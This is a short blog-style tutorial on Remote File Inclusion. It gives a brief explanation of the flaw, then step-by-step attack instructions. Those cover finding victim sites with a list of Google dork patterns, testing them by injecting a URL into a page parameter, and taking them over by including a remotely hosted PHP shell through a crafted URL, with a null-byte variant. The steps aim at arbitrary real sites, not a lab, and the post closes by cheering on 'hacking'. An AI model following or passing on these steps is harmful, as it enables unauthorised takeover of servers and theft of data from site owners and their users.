What is Remote File Inclusion RFI [Full Tutorial]

Remote File Inclusion (RFI) is an attack that targets the computer servers that run Web sites and their applications. RFI exploits are most often attributed to the PHP programming language used by many large firms including Facebook and Sugar CRM. However, RFI can manifest itself in other environments and was in fact introduced initially as "SHTML injection". RFI works by exploiting applications that dynamically reference


external scripts indicated by user input without proper sanitation. As a consequence, the application can be instructed to include a script hosted on a remote server and thus execute code controlled by an attacker. The executed scripts can be used for temporary data theft or manipulation, or for a long term takeover of the vulnerable server.

This can lead to something as minimal as outputting the contents of the file, but depending on the severity, to list a few it can lead to:

•  Code execution on the web server
•  Code execution on the client-side such as JavaScript which can lead to other attacks such as cross site scripting (XSS).
•  Denial of Service (DoS)
•  Data Theft/Manipulation

RFI is a very uncommon vulnerability due to excessive patches and updates on websites.

So lets start with the tutorial, but before reading to this tutorial, read Disclaimer first………
Step I : To find a Vulnerable site which is Vulnerable to Remote file inclusion.
For this You will have to use google dorks. Some of the dorks are like this
inurl:/template.php?pagina=
    inurl:/index.php?pagina=
    inurl:/index.php?inc=
    inurl:/includes/include_onde.php?include_file=
    inurl:/index.php?page=
    inurl:/index.php?pg=
    inurl:/index.php?show=
    inurl:/index.php?cat=
    inurl:/index.php?file=
    inurl:/db.php?path_local=
    inurl:/index.php?site=
    inurl:/htmltonuke.php?filnavn=
(I will give a full detailed dork list for RFI in next posts)
STEP II: To find the Vulnerability of a given website
After getting the website list in google search, we will have to test the Vulnerability of a website. In order to understand better I will be giving u an example
Let us suppose we have a vulnerable website say

 www.vulnerablesite.com

Now we have to add the following keywords to it

"index.php?page=www.google.com”              (Without Quotes)

And it will become like this

www.vulnerablesite.com/index.php?page=http://www.google.com

 
Hit Enter, If the executed page will direct us to google homepage, then we can say that the website is vulnerable to attack.

Step III: Exploitation of the Vulnerability.
After this we will have to upload the shell to the target website. For this we have to take few things into consideration viz, the shell must be in .txt format (shell.txt) like Locus. You can see the shell page and download shells from www.sh3ll.org  . Once we have the shell, we will have to upload it to and freehosting service and the shell page after uploading becomes like this

www.myownwebsite.com/shell.txt
 
After this we will have to add the shell page to the vulnerable website. This can be done by adding these keywords to the vulnerable site 

www.vulnerablesite.com/v2/index.php?page=http://www.myownsite.com/shell.txt

Sometimes we will have to use null bytes for it to execute in a successful way. If we receive an error from "shell.txt" then for this we will have to try "shell.txt?".
Now we are done
Happy Testing and hacking……….
Cheers……….                     
If u got stuck any where, just let me know via comments.
Plz Share the article.